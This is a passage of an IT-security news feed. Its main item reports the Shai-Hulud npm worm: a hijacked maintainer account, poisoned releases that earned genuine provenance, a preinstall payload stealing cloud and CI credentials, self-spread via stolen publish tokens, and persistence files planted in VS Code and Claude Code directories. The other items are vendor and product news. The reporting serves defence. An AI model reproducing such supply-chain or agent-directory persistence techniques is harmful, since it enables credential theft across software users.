<p class="wp-block-paragraph">The important point isn’t Mythos itself. It’s that identifying exploitable weaknesses is becoming faster, cheaper, and easier.</p>



<p class="wp-block-paragraph">Organizations can no longer assume that complexity will keep attackers at bay. Mainframe security strategies should account for a future in which gaps are discovered faster than ever before.</p>



<p class="wp-block-paragraph">That requires greater visibility into the z/OS environment and the risks it may pose. Continuous analysis helps organizations uncover potential weaknesses early, and the sooner security teams can detect security gaps, the more time they have to fix them.</p>



<p class="wp-block-paragraph"><strong>Myth #3: Annual security assessments are sufficient</strong></p>



<p class="wp-block-paragraph">Why is continuous vulnerability analysis important for mainframe security? Many organizations still rely on periodic configuration assessments, even though today’s threats move much faster than they did when those processes were created. Today’s mainframe environments are constantly evolving, and new weaknesses can emerge between checkpoints long before the next scheduled assessment.</p>



<p class="wp-block-paragraph">Security teams need ongoing visibility into risk, not occasional snapshots. That’s why continuous vulnerability analysis has become a critical component of modern mainframe management, helping teams identify and remediate weaknesses before they escalate into incidents.</p>



<p class="wp-block-paragraph">Organizations have long benefited from the security architecture and integrity of mainframe environments. As vulnerability discovery becomes more efficient, maintaining visibility into those environments becomes increasingly important. Rocket Mainframe Security solutions help organizations build continuous visibility across their z/OS environments and act on it early.</p>



<p class="wp-block-paragraph">For organizations seeking greater visibility across their z/OS environment, <a href="https://www.rocketsoftware.com/en-us/products/z-assure-vulnerability-analysis-program" target="_blank" rel="noreferrer noopener">Rocket z/Assure Vulnerability Analysis Program (VAP)</a> helps identify weaknesses within authorized programs and supports ongoing remediation efforts. VAP helps security teams identify security gaps in software earlier, reducing risk before they affect critical systems.</p>



<p class="wp-block-paragraph"><strong>What continuous mainframe security requires</strong></p>



<ul class="wp-block-list">
<li>Visibility into sensitivities across the z/OS environment</li>



<li>Ongoing validation of security controls</li>



<li>Integration with enterprise risk management processes</li>



<li>Faster identification and remediation of emerging weaknesses</li>



<li>Continuous assessment rather than periodic review</li>
</ul>



<p class="wp-block-paragraph"><strong>The future of mainframe security requires continuous vulnerability analysis</strong></p>



<p class="wp-block-paragraph">Security weaknesses can exist anywhere in the enterprise, and they are being discovered faster than ever before. Detecting risk is getting easier, and organizations should plan accordingly.</p>



<p class="wp-block-paragraph">This is where continuous vulnerability analysis becomes essential. Point-in-time assessments provide a snapshot of risk, while continuous risk analysis helps organizations maintain visibility as systems change.</p>



<p class="wp-block-paragraph">The broader lesson from advanced AI models like Mythos is that vulnerability discovery is accelerating. For organizations that depend on the mainframe, visibility becomes more important as the time between discovery and exploitation shrinks. Organizations that adopt continuous analysis across critical environments will be better positioned to identify and address risk before attackers do.</p>



<p class="wp-block-paragraph"><a href="https://www.rocketsoftware.com/en-us/products/z-assure-vulnerability-analysis-program" target="_blank" rel="noreferrer noopener">Learn more here.</a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Shai-Hulud npm worm didn't fake its security check — it earned a legitimate one]]></title>
<description><![CDATA[An attacker on Tuesday took over the GitHub account of the developer who maintains keyv, a small key-value storage library that npm serves roughly 127 million times a week. Within hours, poisoned versions of keyv and its sibling caching packages were live on npm, carrying a credential-stealing wo...]]></description>
<link>https://tsecurity.de/de/3706411/it-nachrichten/the-shai-hulud-npm-worm-didnt-fake-its-security-check-it-earned-a-legitimate-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706411/it-nachrichten/the-shai-hulud-npm-worm-didnt-fake-its-security-check-it-earned-a-legitimate-one/</guid>
<pubDate>Wed, 05 Aug 2026 19:31:14 +0200</pubDate>
<content:encoded><![CDATA[<p>An attacker on Tuesday took over the GitHub account of the developer who maintains <a href="https://keyv.org/">keyv</a>, a small key-value storage library that <a href="https://www.npmjs.com/">npm</a> serves roughly 127 million times a week. Within hours, poisoned versions of keyv and its sibling caching packages were live on npm, carrying a credential-stealing worm. By midday, <a href="https://www.aikido.dev/blog/keyv-and-friends-compromised-in-npm-supply-chain-attack">security firm Aikido</a> counted at least 868 compromised packages across 1,381 versions, together carrying over two billion monthly installs, a total still climbing. <a href="https://jfrog.com/">JFrog</a> independently traced the campaign across more than 400 packages and 1,700 poisoned versions. </p><p>The part that should worry every security team is not the download count. It is the paperwork. The initial poisoned releases shipped with valid provenance signatures, the cryptographic attestation the industry built to prove a package came from where it claims. The worm did not forge that signature. It earned it, the way a legitimate release would.</p><p>A day earlier, <a href="https://www.crowdstrike.com/en-us/">CrowdStrike</a> published its <a href="https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-threat-hunting-report/">2026 Threat Hunting Report</a> and predicted this exact shape of attack. A section titled "Software Supply Chain Attacks Evolve" names the developer ecosystem itself, package registries, continuous integration pipelines, container registries, and the extensions developers load into their code editors, as the surface adversaries now go after directly. It puts npm packages at the center of that shift, tied to 87% of the malicious software registry threats CrowdStrike tracked in the first half of the year. The keyv worm turned that finding into a live incident inside 24 hours.</p><p>For CISOs and security architects, the two events read as one message. The trust signals built into the software supply chain can be satisfied by an attacker who owns the right account, and the window between disclosure and exploitation has collapsed past what monthly patching absorbs.</p><h2><b>How the worm earned its provenance</b></h2><p>Walk through the mechanism and it becomes clear why provenance did not help. According to Aikido's analysis, the attacker pushed malicious files straight to the main branch of each repository the maintainer controlled, then immediately cut a new release. Because the release ran through the maintainer's own GitHub Actions workflow, npm generated a legitimate provenance attestation for it. To anyone auditing supply chain integrity, the poisoned build looked authentic. <a href="https://www.wiz.io/blog/keyv-and-cacheable-npm-supply-chain-attack">Wiz confirmed the release path independently</a>, and in one targeted path documented by JFrog the worm went further. Inside a GitHub Actions run tied to opensearch-js, it requested an OIDC token, exchanged it for a publish token, and minted a Sigstore bundle through Fulcio and Rekor so the malicious tarball carried provenance generated from the trusted workflow context itself.</p><p>What turned a single account takeover into a registry-wide event was the spread. Once a poisoned package landed in a developer's environment or a build runner, its payload harvested every credential it could reach, then used any npm publishing tokens it found to backdoor other packages that the victim controlled. Each compromised maintainer became an unwitting distribution node, with Aikido watching dozens of newly infected packages appear every few minutes. The malware exfiltrated stolen secrets to public GitHub repositories tagged "Shai-Hulud: Here We Go Again," the signature that named the campaign.</p><p>This blast radius reached well beyond obscure utilities. Because keyv sits as a transitive dependency under many popular tools, the worm rode those chains into packages under corporate npm scopes, <a href="https://www.aikido.dev/blog/keyv-and-friends-compromised-in-npm-supply-chain-attack">with releases tied to Deliveroo, Qlik, and Picsart among the confirmed hits</a>. Developers at those companies never installed keyv on purpose. They only depended on something that depended on it, layers down a tree no one reviews by hand.</p><p>Credential extractors inside the payload reveal what the attackers were actually after, and it was never the caching libraries. <a href="https://research.jfrog.com/post/shai-hulud-is-back-august/">JFrog, which traced the compromise across keyv and cacheable</a>, and <a href="https://www.wiz.io/">Wiz</a> both found the malware harvesting cloud access keys, CI secrets, and the tokens that authenticate to production infrastructure. The package compromise was the vehicle, and the cloud behind it was always the destination. CrowdStrike found cloud-conscious criminal activity rose 171% in the first half of 2026, and supply chain compromise is one of the paths feeding it.</p><h2><b>The target was the developer's own tools</b></h2><p>Stealing was not the end of it, because the worm also planted itself where developers work. Wiz found that the malware drops persistence payloads into two directories on machines it reaches, one for Visual Studio Code and one named .claude, the working directory for Anthropic's Claude Code agent. The setup files placed there mean the payload can run when a developer opens the infected project in their editor or starts an AI coding session, not only at install time. This is the developer ecosystem CrowdStrike named, hit precisely, the editor and the AI assistant a developer trusts most and inspects least.</p><h2><b>The fix costs nothing</b></h2><p>One control would have blunted the worm, and it costs nothing. Adam Meyers, who leads Counter Adversary Operations at CrowdStrike, laid it out in a pre-release interview under embargo. "Secure the software supply chain," he said. "Simple things like not allowing any of your tooling to pull down the most recent dependencies, but maybe last week's dependencies." The delay is the whole point. "You're still going to have pretty up-to-date stuff, but you won't have that risk of pulling down something that was updated minutes ago, and now you've just onboarded some sort of malicious tooling." A release held back a week gives the security community time to catch a poisoning that would otherwise reach every downstream build within minutes.</p><p>That guidance is not hypothetical. npm shipped this capability in February 2026 with CLI version 11.10.0 as a <a href="https://docs.npmjs.com/cli/v11/using-npm/config#min-release-age">setting called min-release-age</a>. pnpm got there five months earlier with <a href="https://craigory.dev/blog/2026-05-29/package-manager-release-cooldown/">minimumReleaseAge</a>. Either one lets a team reject any package version published more recently than a threshold they set. The keyv worm is the argument for turning it on.</p><p>Meyers pairs the cooldown with a second discipline. Patch what attackers are exploiting before anything else. "You need to kind of focus your vulnerability mitigation and patching around the exploits that are known to the exploiter," he told VentureBeat. He pointed to a resource most teams underuse. "CISA here in the United States puts out something called the Known Exploited Vulnerability Catalog," updated weekly with flaws confirmed under active attack, government-maintained and free. "If you patch those vulnerabilities first, you're going to probably be safer."</p><p>Meyers put hard numbers to the speed problem, numbers that do not appear in the published report. All of 2025 saw roughly 48,200 vulnerabilities registered as CVEs. When he checked the week before the briefing, 2026 had already reached 43,000. </p><p>That volume breaks monthly patch cycles. "They cannot operate in 30-day patch windows," he told VentureBeat. "As soon as a vulnerability is disclosed, they need to be moving towards patching or mitigating that particular issue." CrowdStrike's report pairs that trajectory with a finding that 88% of the exploitation it observed against vulnerabilities with a public proof of concept happened inside 48 hours of the code going public.</p><h2><b>GitHub hardened half the problem</b></h2><p>GitHub, which owns npm, <a href="https://github.blog/changelog/2025-09-29-strengthening-npm-security-important-changes-to-authentication-and-token-management/">has spent the past year hardening the registry</a> against precisely this class of attack. The platform made two-factor authentication mandatory for publishing, revoked old never-expiring access tokens, and added trusted publishing so build systems push without stored credentials. Then in <a href="https://thehackernews.com/2026/07/npm-12-disables-install-scripts-by.html">npm version 12</a>, released in mid-2026, it flipped the most consequential default. The preinstall, install, and postinstall hooks that most registry malware relies on to execute the moment a package lands now require explicit approval.</p><p>That change matters directly here because the keyv worm executes through a preinstall script, and npm 12 cuts both ways. JFrog confirmed that on npm 12 or newer, where preinstall hooks are off by default, the malware does not run at install time. Every organization still on an older npm, and most enterprises upgrade slowly, remained exposed. </p><p>GitHub's defenses hardened the wrong half of the attack more than the right one, making it harder for a malicious package to execute once it lands while doing less to stop an attacker from earning the right to publish. Account takeover remains the root cause. Kiran Raj, a security engineer at <a href="https://www.endorlabs.com/">Endor Labs</a>, said he saw the same pattern, an npm publishing token stolen and reused, in most cases a CI or service-account token harvested from a build runner that had itself installed a poisoned dependency. The worm never had to defeat provenance. It needed one set of valid credentials, and npm's own publishing automation did the rest.</p><p>Provenance attestation answers whether a package came from the pipeline it claims. It does not answer whether the human or token that triggered that pipeline was supposed to. Identity governance, who can publish and what their credentials can reach, is the weaker control. CrowdStrike names abuse of legitimate developer identities as the primary entry point for supply chain compromise. Meyers put it plainly. "They log in, they don't hack in," he said. The keyv maintainer's account was that identity, and the trusted-publishing machinery did the rest on the attacker's behalf.</p><h2><b>Why the boardroom is next</b></h2><p>The pressure to fix this will not come only from threat reports. It is about to come through contracts. Kayne McGladrey, a senior member of the IEEE, told VentureBeat in an exclusive interview that enterprises are starting to push software security obligations onto the vendors and maintainers in their supply chains. "We're going to start seeing companies trying to contractually shift liability to other parties in their supply chain," he told VentureBeat. "We're using your technology, but we want you to do the security for it." </p><p>He compared it to how the Department of Defense forced its vendors to raise their game through the CMMC certification program. "Get better at cybersecurity if you want to sell us stuff." For any company shipping software on open-source dependencies, that turns provenance, identity, and patch discipline into contractual exposure.</p><h2><b>What to do Monday morning</b></h2><p>For a security team deciding what to do about this on Monday morning, the actions divide into five moves that map to the five ways this attack class operates. Each is a governance decision a board can fund and audit, not a tool a developer installs alone.</p><table><tbody><tr><td><p><b>How the attack operates</b></p></td><td><p><b>What the keyv worm showed</b></p></td><td><p><b>What the board funds and audits</b></p></td></tr><tr><td><p>The developer ecosystem is the target.</p></td><td><p>CrowdStrike names package registries, CI/CD pipelines, container registries, and IDE extensions as the surface adversaries hit directly. The keyv payload planted persistence hooks in developer editor and AI tooling directories, not just the package.</p></td><td><p>Require provenance attestation and trusted publishing before any dependency or editor extension enters a build. Give the board a standing inventory of registries, pipeline components, and extensions in scope. Treat developer tooling as an audited supplier category.</p></td></tr><tr><td><p>Automation makes the spread fast.</p></td><td><p>One stolen credential seeded a cascade that reached at least 868 packages and two billion monthly installs in hours, jumping between organizations every few minutes. The worm ran through a preinstall script, the install-time default npm v12 disables.</p></td><td><p>Turn on npm's min-release-age so tooling pulls last week's versions, not releases published minutes ago. Require npm v12 or install-script blocking across the build estate. Plan for simultaneous multi-package compromise in resilience testing.</p></td></tr><tr><td><p>Identity is the entry point.</p></td><td><p>The attack began with one hijacked GitHub maintainer account. Provenance signed the poisoned releases because they ran through the maintainer's own pipeline. Valid credentials, not a broken control, did the damage.</p></td><td><p>Mandate phishing-resistant multifactor authentication for every maintainer with publish rights. Prefer short-lived scoped tokens over long-lived ones. Report developer and machine identity coverage to the board as a countable liability.</p></td></tr><tr><td><p>The cloud is the real destination.</p></td><td><p>The payload carried targeted extractors for cloud access keys, CI secrets, and production infrastructure tokens. The package compromise was the vehicle. Cloud-conscious criminal activity rose 171% in the first half of 2026.</p></td><td><p>Classify developer workstations and CI runners as tier-zero assets with domain-controller rotation standards. Document cloud credential rotation in hours after any supply chain exposure. Report long-lived cloud keys with reduction targets.</p></td></tr><tr><td><p>The patch window has collapsed.</p></td><td><p>CrowdStrike observed 88% of exploitation with a public proof of concept inside 48 hours. Meyers put 2026 CVE registrations at 43,000 by late July against 48,200 for all of 2025. The keyv worm was live within hours, with no CVE to wait for.</p></td><td><p>Reset patch service levels for internet-facing systems from days to hours and fund continuous emergency patching as a budgeted operation. Give the audit committee time-from-disclosure-to-mitigation as a standing metric. Build defensibility on documented pre-patch compensating controls.</p></td></tr></tbody></table><p><i>Package counts reflect Aikido and JFrog tracking as of August 4 and were climbing at press time.</i></p><p>The keyv worm will be contained. Compromised versions pulled, stolen tokens rotated, affected packages republished clean. What will not change is the shape of the exposure it revealed. The developer ecosystem is now a primary target, the automation that makes it productive is the same automation that makes a worm fast, and the trust signals meant to secure it can be satisfied by anyone holding the right credentials. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is exposing the limits of traditional network architecture]]></title>
<description><![CDATA[Presented by Tata Communications Continuous inference, agent-to-agent communication, and real-time data pipelines are generating unpredictable, always-on traffic that legacy architectures were never built to support. As AI moves from pilot project to operational backbone, the network is emerging ...]]></description>
<link>https://tsecurity.de/de/3706239/it-nachrichten/ai-is-exposing-the-limits-of-traditional-network-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706239/it-nachrichten/ai-is-exposing-the-limits-of-traditional-network-architecture/</guid>
<pubDate>Wed, 05 Aug 2026 17:18:53 +0200</pubDate>
<content:encoded><![CDATA[<p><i>Presented by Tata Communications </i></p><hr><p>Continuous inference, agent-to-agent communication, and real-time data pipelines are generating unpredictable, always-on traffic that legacy architectures were never built to support. As AI moves from pilot project to operational backbone, the network is emerging as a critical control layer that determines performance, reliability, and cost. </p><p>The shift is forcing organizations to question assumptions that have held for decades. Legacy systems were static and rigid, and lacked the ability to manage network demand efficiently or dynamically, while AI-ready networks need to adapt in real time. A study by <a href="https://www.cisco.com/c/dam/en/us/solutions/collateral/artificial-intelligence/race-to-agentic-ai-report.pdf">Cisco</a> notes that 80% of executives believe their company’s competitive survival will depend on agentic AI, and consumer usage of AI is already prevalent and accelerating. This is driving a fundamental shift in how traffic is generated, distributed, and experienced, with implications for service providers and enterprises that manage large-scale networks.</p><p>This infrastructure gap is a global concern. A recent Bloomberg study, "<a href="https://www.tatacommunications.com/hubfs/library/digital-fabric/documents/durable-ai-advantage-bloomberg-report.pdf">The Future-Ready Enterprise</a>," commissioned by Tata Communications, found that while 3 in 4 leaders consider AI a board-level priority, nearly two-thirds (65%) of enterprises continue to operate on transitional or legacy infrastructure. This disconnect between ambition and reality is a primary obstacle to realizing value from AI investments.</p><p>The performance bar has also moved by an order of magnitude. Traditional business applications could tolerate 100 to 500 milliseconds of latency, while mission-critical AI workloads now require latency below 10 milliseconds.</p><p>"This isn't just an incremental improvement," says Kapil, Vice President, Global Network Services at Tata Communications. "It's a completely different performance paradigm that breaks traditional network design assumptions, where such extreme low latency was never a primary consideration."</p><h2>How network performance affects AI reliability and cost</h2><p>That gap between what legacy infrastructure can deliver and what AI demands turns network performance into a direct driver of AI reliability and cost. Treating the network as a best-effort transport layer introduces risk that many organizations only discover once a deployment underperforms in production. A model built for real-time fraud detection or supply chain optimization becomes worthless the moment network congestion delays the data it depends on, and Kapil notes that every millisecond of that delay can carry a direct financial or operational cost.</p><p>"Relying on a 'best-effort' network turns multi-million-dollar AI stack investments into a high-stakes gamble, where performance is left to chance," Kapil says.</p><p>He adds that businesses often underestimate the complexity of using the public internet as a global enterprise network. Performance may look acceptable within a single country, but once data starts crossing borders or connecting to international cloud platforms, the lack of end-to-end control becomes an operational barrier.</p><h2>Distributed AI across cloud, edge, and enterprise increases complexity</h2><p>Complexity compounds as AI components spread across cloud, edge, and enterprise environments. Organizations often focus on compute power and data infrastructure while overlooking the network fabric that connects them. That blind spot often surfaces as a performance bottleneck created by high-frequency east-west traffic moving between GPUs. </p><p>Distribution also widens the surface enterprises have to defend. Applications, users, and partner ecosystems are now spread across cloud, SaaS, edge, and device environments, and Kapil notes that AI-driven malicious bots account for roughly 37 percent of online traffic, making it increasingly difficult to distinguish legitimate users from automated threats. Many enterprises have responded by layering on siloed tools, which has produced fragmentation, inconsistent security, and a lack of unified visibility rather than a coherent defense.</p><p>"SASE helps mitigate these risks by converging networking and security into a unified, cloud-delivered architecture," Kapil says. "This convergence is enabling consistent policy enforcement across cloud, on-premises, and edge environments, while supplying the scalability and proximity needed to secure real-time AI-driven interactions."</p><h2>The network must evolve from passive transport to an intelligent layer</h2><p>Closing that gap requires organizations to gain far greater visibility into how AI traffic moves across distributed environments and the ability to direct workloads accordingly. Kapil says that demands a different approach to network management.</p><p>"Leaders must realize that the network is no longer passive 'plumbing.' It must be managed as an active, intelligent platform foundational to the entire AI stack," he says. "That platform requires real-time observability into how and where AI traffic flows, paired with the control to orchestrate workloads across the most efficient and secure path available." </p><p>It's the difference between merely connecting systems and unlocking new capability, for instance a seamless shopping experience during a peak sales period or a global sports broadcast streamed without buffering.</p><p>This intelligence also changes how infrastructure teams spend their day. The network itself is now software-defined and API-driven rather than fixed by hardware configuration, which Kapil says shifts infrastructure teams away from reacting to outages and toward designing the systems that prevent them.</p><p>"Instead of manually re-routing traffic during an outage, the team must define the rules, policies, and business outcomes for an intelligent fabric," Kapil says. "The network itself then executes those policies automatically and autonomously."</p><p>Tata Communications is putting this principle into practice with its recently launched <a href="https://www.tatacommunications.com/press-release/dc-dynamic-connectivity">IZO Data Centre Dynamic Connectivity</a>. The software-defined platform creates a “self-healing, intelligent network” using deterministic multi-path routing to reroute traffic automatically in seconds during a disruption.</p><p>The company says the platform transforms resilience from a reactive process into an autonomous capability, providing the predictable, low-latency performance mission-critical AI applications require while reducing operational costs by up to 30%.</p><h2>Real-time AI requires predictable, low-latency connectivity</h2><p>Delivering on that intelligence in practice means giving mission-critical workloads dedicated capacity rather than having them compete for it. Reaching that level of consistency also requires enterprises to define performance far more precisely than they have in the past. It's the shift from vague goals like "high performance" toward deterministic performance criteria where an organization commits to a guaranteed service level, such as latency for a specific workload not exceeding 10 milliseconds 99.999% of the time, for instance.</p><p>That same demand for predictability extends into capacity planning. As AI workloads become larger and more dynamic, networking infrastructure must be able to absorb rapid shifts in demand without sacrificing performance or efficiency.</p><p>"Without dynamic scalability, enterprises are forced into a false choice: either risk performance-killing congestion or engage in massive, inefficient overprovisioning of their network 'just in case.' This is incredibly expensive and unsustainable," Kapil says.</p><p>Building this foundation for the world's most demanding AI workloads is already underway. For example, Tata Communications is collaborating with Amazon Web Services (AWS) to build one of India’s largest<a href="https://www.tatacommunications.com/press-release/tata-communications-paves-way-for-amazon-web-services-advanced-ai-optimised-network-in-india">AI-ready networks</a>. This high-capacity, resilient network will connect major AWS infrastructure locations in Mumbai, Hyderabad, and Chennai, providing the ultra-low latency backbone needed to accelerate generative AI adoption and cloud innovation across the country.</p><p>He points to a consumption-based model, where software allows bandwidth and network functions to scale instantly with demand, as the operational alternative, since it lets organizations pay only for what they use while still protecting performance during spikes.</p><h2>CIOs should treat the network as a strategic investment</h2><p>CIOs and infrastructure leaders need to reframe the network, not thinking of it as a cost center but as something closer to an insurance policy for an organization's broader AI investment portfolio. An intelligent network de-risks those investments in three ways: </p><p>enabling dynamic scalability that removes the need for overprovisioning</p><p>strengthening security and governance through the visibility needed to protect data and models</p><p>and providing a flexible, programmable foundation that can absorb future compute demands without a full architectural overhaul.</p><p>Getting there does not require enterprises to start from scratch. </p><p>Choosing a partner with a proven track record is critical. Tata Communications was recently named a <a href="https://www.tatacommunications.com/press-release/dc-dynamic-connectivity">Leader in the Gartner Magic Quadrant</a> for Global WAN Services for the 13th consecutive year, reflecting its completeness of vision and ability to execute. That recognition reflects continued investment in areas such as SASE capabilities for AI-driven security and high-capacity 800G services designed for AI-scale infrastructure.</p><p>"We recommend a phased approach that begins with assessing the current state of the network and identifying inefficiencies, then prioritizing upgrades in areas such as AI-ready technologies, seamless data exchange, and advanced security solutions," Kapil says. "Treating the network as a business enabler rather than overhead gives organizations the scalable, secure, and resilient infrastructure the AI economy will continue to demand."</p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS updates DynamoDB with native vector search to ease AI application development]]></title>
<description><![CDATA[AWS is finally adding native vector search to its managed NoSQL database DynamoDB, which is typically used to store high-volume operational and transactional data.



The update, according to analysts, removes complexity for development teams that are trying to maintain separate vector databases ...]]></description>
<link>https://tsecurity.de/de/3706223/ai-nachrichten/aws-updates-dynamodb-with-native-vector-search-to-ease-ai-application-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706223/ai-nachrichten/aws-updates-dynamodb-with-native-vector-search-to-ease-ai-application-development/</guid>
<pubDate>Wed, 05 Aug 2026 17:15:28 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS is finally adding native vector search to its managed NoSQL database DynamoDB, which is typically used to store high-volume operational and transactional data.</p>



<p class="wp-block-paragraph">The update, according to analysts, removes complexity for development teams that are trying to maintain separate vector databases for a rapidly growing class of AI and agentic applications that rely on real-time access to operational and transactional data to improve the accuracy and relevance of their responses.</p>



<p class="wp-block-paragraph">“This collapses a common two-database architecture into one operational data layer. Developers can update an item and its vector representation together, use familiar DynamoDB APIs, and avoid building a separate synchronization pipeline. That should materially shorten time-to-market for AI features built around existing DynamoDB data,” said <a href="https://www.linkedin.com/in/slwalter/" target="_blank" rel="noreferrer noopener">Stephanie Walter</a>, practice lead of the AI stack at HyperFRAME Research.</p>



<p class="wp-block-paragraph">Prior to the update, enterprises using <a href="https://www.infoworld.com/article/2299962/amazon-dynamodb-brings-speedier-nosql-to-the-cloud.html">DynamoDB</a> typically had to copy data into OpenSearch or another vector database, such as <a href="http://infoworld.com/article/2335861/pinecone-s-new-serverless-database-may-see-few-takers-analysts-say.html">Pinecone</a> and <a href="https://www.infoworld.com/article/3842740/weaviate-adds-agents-to-its-tech-stack-to-ease-gen-ai-app-development.html">Weaviate</a>, often using DynamoDB Streams or custom pipelines, which meant operating two data layers and managing embedding generation, backfills, retries, schema changes, security policies, and synchronization, Walter noted.</p>



<p class="wp-block-paragraph">That dependence on two separate data layers, Walter pointed out, added to query latency and increased the risk of the vector index lagging behind the operational record.</p>



<p class="wp-block-paragraph">Such delays, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, executive research leader at HFS Research, can have real consequences for AI agents: “If an agent is acting on what it retrieves, a synced-five-minutes-ago copy can mean a confident wrong action.”</p>



<p class="wp-block-paragraph">Beyond improving data freshness, eliminating a separate vector database could also lower cloud and operational costs, Chaturvedi said: “Maintaining a second database meant paying at least $700 a month for a second database regardless of usage.”</p>



<p class="wp-block-paragraph">For CIOs, those benefits combined could translate into lower total cost of ownership and simpler governance as enterprises scale AI applications, Chaturvedi added.</p>



<p class="wp-block-paragraph">“It is a real consolidation for CIOs: fewer systems to secure, no pipelines to maintain, fresh data. Add to it usage-based cost, which means no standing minimums for idle infrastructure, even at trillion-vector scale,” Chaturvedi noted.</p>



<p class="wp-block-paragraph">The architectural simplification could also make AI adoption easier for business leaders by eliminating the need to staff and govern a second data platform, said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Insights &amp; Strategy.</p>



<p class="wp-block-paragraph">Native vector search capabilities have been gaining popularity over the past few years. Over the last three years, AWS has steadily expanded vector search across its database portfolio, adding support to Aurora PostgreSQL through pgvector, Amazon MemoryDB for Redis and Amazon DocumentDB as enterprise demand for generative AI applications has grown.</p>



<p class="wp-block-paragraph">Rivals have followed a similar path, with MongoDB, Microsoft, Google Cloud, Oracle and Couchbase integrating native vector search into their databases to support <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation (RAG)</a>, AI agents and other generative AI workloads.</p>



<p class="wp-block-paragraph">These announcements themselves reflect a broader convergence in the database market since the rise of generative AI. While specialized vector databases have expanded beyond similarity search by adding SQL, <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a> and operational database capabilities, mainstream operational databases have been embedding vector search and RAG capabilities into their core platforms, allowing enterprises to consolidate AI and transactional workloads on fewer data platforms.</p>



<p class="wp-block-paragraph">AWS has not shared details on the rollout of DynamoDB’s native vector search capability, including its availability timeline or the AWS Regions where it will initially be offered.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Stolen Credentials to Full Breach: The 72-Hour Timeline]]></title>
<description><![CDATA[A single compromised credential is often all it takes to turn an ordinary workday into a full-scale cybersecurity incident. Despite investments in firewalls, endpoint security, and identity controls, attackers continue to exploit one of the simplest yet most effective entry points—stolen username...]]></description>
<link>https://tsecurity.de/de/3706192/it-security-nachrichten/from-stolen-credentials-to-full-breach-the-72-hour-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706192/it-security-nachrichten/from-stolen-credentials-to-full-breach-the-72-hour-timeline/</guid>
<pubDate>Wed, 05 Aug 2026 17:02:01 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/08/72-hour-Timeline.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="72-hour Timeline" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/08/72-hour-Timeline.webp 1200w, https://cyble.com/wp-content/uploads/2026/08/72-hour-Timeline-300x150.webp 300w, https://cyble.com/wp-content/uploads/2026/08/72-hour-Timeline-1024x512.webp 1024w, https://cyble.com/wp-content/uploads/2026/08/72-hour-Timeline-768x384.webp 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="From Stolen Credentials to Full Breach: The 72-Hour Timeline 2"></p>
<p><!-- wp:paragraph --></p>
<p>A single compromised credential is often all it takes to turn an ordinary workday into a full-scale cybersecurity incident. Despite investments in firewalls, endpoint security, and identity controls, attackers continue to exploit one of the simplest yet most effective entry points—stolen usernames and passwords. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Whether exposed through <a href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noreferrer noopener">phishing campaigns</a>, malware infections, credential-stealing infostealers, or <a href="https://cyble.com/knowledge-hub/what-is-a-data-breach/" target="_blank" rel="noreferrer noopener">data breaches</a>, compromised credentials are readily traded across underground forums and <a href="https://cyble.com/knowledge-hub/top-dark-web-marketplaces-of-2024/" target="_blank" rel="noreferrer noopener">dark web marketplaces</a>. Once obtained, threat actors waste little time putting them to use. What begins as an unauthorized login can quickly escalate into privilege abuse, lateral movement, data exfiltration, and <a href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noreferrer noopener">ransomware</a> deployment—all within a matter of hours. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The risk is no longer theoretical. According to Cyble Research &amp; Intelligence Labs (CRIL), more than <a href="https://cyble.com/blog/dark-web-intelligence-monitoring-guide/" target="_blank" rel="noreferrer noopener">6,046 confirmed data breach incidents</a> were monitored globally in 2025, with stolen credentials and compromised identities remaining one of the most common starting points for enterprise attacks. At the same time, Cyble researchers continue to observe credentials harvested through infostealer malware being traded across underground marketplaces, enabling attackers to purchase valid enterprise access for as little as a few dollars. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>The 72-hour Timeline</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Understanding how quickly credential-based attacks unfold is critical for reducing response times. The following 72-hour timeline breaks down each stage of a typical intrusion, highlights the attacker’s objectives, and identifies key detection opportunities that can help security teams interrupt the attack before it becomes a business-wide crisis. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Stolen credentials often appear on underground marketplaces long before organizations realize they have been compromised. Cyble's <a href="https://cyble.com/solutions/dark-web-monitoring/" target="_blank" rel="noreferrer noopener">Dark Web Monitoring</a> continuously tracks dark web forums, marketplaces, and leak sources to identify exposed corporate credentials early, enabling security teams to investigate and remediate risks before attackers can exploit them. </p>
<p><!-- /wp:paragraph --></p>
